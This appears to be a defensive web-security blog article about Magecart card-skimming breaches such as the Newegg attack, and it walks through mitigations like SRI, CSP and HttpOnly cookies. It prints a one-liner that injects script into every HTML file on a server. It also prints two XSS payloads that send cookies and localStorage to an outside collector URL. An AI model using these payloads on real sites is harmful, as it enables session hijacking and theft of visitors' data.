With Black Friday little over a month away, the thought of a security breach exposing customer details to hackers should strike fear in the heart of every online retailer. TicketMaster, Newegg, British Airways, and others have been targeted recently in a string of attacks harvesting over a million customer records, see media coverage of the British Airways, Shopper Approved, and Newegg breaches.

This article will dive into what’s so novel about these heists, and provide steps on how to protect your web application from similar vulnerabilities. Please note that this article is fairly technical in nature, but hopefully there’s something in it for everyone.

Magecart payload

Unconventional (or, the New Normal)

One common hacking pattern is to attack a public facing web server, find database credentials stored somewhere in the filesystem, connect to the database with those credentials and export the juiciest data. A quick job, and it can go on undetected for months, that is, if it is ever discovered at all.

These new attacks are neat in that they’re a 2-step process:

Find a way to inject malicious JavaScript code into a web page in which a user enters sensitive data
Wait for users to send you all their sensitive information without realizing it

Instead of stealing all the data at once, it’s leaked out transaction by transaction as users log in, pay for items, or execute other sensitive operations. This is an instance of the confused deputy problem:

The original confused deputy

The user’s web browser is tricked into giving up sensitive data that it shouldn’t.

Let’s use Newegg as an example. When a user would make a purchase from https://secure.newegg.com, they were also sending data to https://neweggstats.com/, an innocent looking domain that was registered and operated by Magecart. Operating from August 16 - September 18, 2018, Magecart harvested an undisclosed amount of credit card and personal details from Newegg customers.

They were able to do this because someone inserted 15 lines of malicious code at the end of a JavaScript file used by the website. Whether it was injected by an employee or hacker that breached the web server remains to be seen.

Isn’t this just Cross-Site Scripting (XSS)?

Yup, for a quick refresher see this. All the usual defenses apply, so let’s go through a few:

Defense 1: Immutable web content

Many web servers are configured to allow writable access to web content. At some level it’s unavoidable: How else can you deploy the website in the first place? But there is a tremendous amount of attack surface between allowing writable access to a privileged user used only for deployment, and allowing a web application to rewrite any or all of its files.

Let me illustrate this with an example.

For those of you running Linux web servers, if you were to run the following command as the www server user:

find / -iname '*html*' -exec perl -i -p -e 's/<head>/<head><script>alert("oh boy")<\/script>/g;' {} \;

Would users of your website receive an annoying popup?

What that command does is search for all files with html in the filename, and inject a tiny script that displays a popup when the page is loaded. Replace the popup with a different script that captures form data and sends it to a data-collector and all you have to do is wait for the credit card numbers to roll in. Once you’ve had enough, run a reversal script that makes it look like you were never there at all.

“But I’d never run that nefarious script!” You wouldn’t, but someone who found a hole in your avatar upload PHP script will. All it takes is one unsanitized shell_exec or Runtime.exec() and all of a sudden you’re serving malware to unsuspecting users.

Defense 2: Subresource Integrity (SRI)

This one applies to external JavaScript files that are included in a web page. Subresource integrity is a way of loading an external JavaScript resource, verifying that the resource hasn’t been manipulated. The way that is done is to calculate a cryptographic hash over the file when you first embed it, so that if the file’s content changes later on then the hash won’t match. For example:

<script src="https://cdn.com/jquery.js" integrity="sha384-FFCAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"></script>

If cdn.com is compromised and someone replaces jquery.js with a malicious payload, the sha384-FFCAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC hash won’t match, turning what would have been a Cross-Site Scripting attack into a mere Denial of Service.

Defense 3: Content Security Policy (CSP)

Content Security Policy is the closest thing to a silver bullet for many kinds of injection attacks. It’s like a firewall for your web page, providing the ability to white-list specific domains for specific purposes. It’s fine-grained control allows you to do things like:

White-list certain domains for JS or CSS resources, disallowing access to all others
Ban all CDNs, requiring JS and CSS to be delivered from the page’s origin
Allow JS from cdn.example.com and nowhere else
Disallow all inline <script> tags
Mandate all cookies have the secure flag set
Mandate Subresource Integrity on all JS scripts
Receive reports when the CSP is violated

This is all done through the use of HTTP headers. This can be a bit unwieldy at first, but the big benefit is that it can be specified upstream of your web server, at the load balancer or reverse proxy level.

The other good thing about CSP is that it explicitly codifies the list of third parties you trust to inject code into your web page in a user’s web browser. This will be an important part of any disaster recovery or risk mitigation strategy.

Defense 4: HttpOnly Cookies

At this point we are beyond defense, and onto damage mitigation. An attacker has found a way to inject malicious code into your website. How can we limit the damage they can do?

Cookies are a valuable target. If a user has selected “Keep me logged in” or something similar, cookie theft can allow user impersonation.

Here’s the oldest XSS payload in the book:

<script>document.location='https://walletinspector.com/cookiemonster.php?c='+document.cookie;</script>

If you can sneak that into a forum post or guest book comment and the site doesn’t properly sanitize input, every visitor who views that post will send you their delicious cookies. The standard defense is a HttpOnly cookie. These are cookies sent from the client to the server in the usual way, but they don’t show up in document.cookie so JavaScript can’t see them.

Lately, cookies have fallen out of fashion and localStorage has become much more popular. In this era of micro-services and shared-nothing architecture, the humble cookie gets short shrift. That’s a shame, because localStorage is vulnerable to the second-oldest XSS in the book:

<script>document.location='https://walletinspector.com/cookiemonster.php?c='+JSON.stringify(localStorage);</script>

And now we’re back where we started: One XSS and someone can grab the whole localStorage-jar. Using localStorage for anything you wouldn’t want on a billboard is a ticking time bomb.

Defense 5: Chain of Custody for assets

Chain of custody is a concept in law enforcement where every interaction with a piece of evidence is audited to prevent tampering or contamination. Why is this important? Let’s use the Newegg breach as an example.

Investigators discovered that a JavaScript asset Modernizr.js had been compromised, with 15 lines of malicious JavaScript tacked onto the end. How did it get there? Here is one speculative possibility:

Developer is assigned a bug where the site doesn’t display correctly on an older version of Internet Explorer
Internet research shows that a free third-party library called Modernizr fixes this and other compatibility issues with older browsers.
Developer goes to https://modernizr.com/, clicks Download
Copies file into project
Tests locally, appears that it fixes the bug
Commits changes into version control system
Deploys changes to production
[1 month passes, possibly with more deploys]
User visits website, is served malicious version of Modernizr

The details of their deployment process may be different but these are the broad strokes. What can we deduce:

There is likely an audit trail around the version control system.
Because of this, we should be able to tell if the file that was checked into VCS was compromised.
If the file in VCS is clean, it’s likely the file was modified somewhere between step 8 and 9.
If the file in VCS is malicious, it’s likely the file was modified somewhere between step 3 and 6.

That would help narrow things down, but you can likely see a few gaps. If you work backwards from your boss coming up to you demanding “I need you to be able to prove to me that the version of Modernizr we send our customers is the exact same as the version on Modernizr’s website”, that will help fill in some of the missing blanks in your information security policy.

Conclusion

Safety regulations are written in blood, and risk management policies are written in bottom-line losses. The same bean-counters that got rid of the slip-and-slide at the company picnic after someone broke a leg are going to, if they aren’t already, be asking questions like “How likely is it that this sort of thing happens to us?” Hand-waving away “we follow best practices” will only get you so far.

This article only scratches the surface of web application security, but I hope it gives you some ideas on how to make your systems even more secure.

Any comments or ideas for future articles are appreciated, thanks for reading.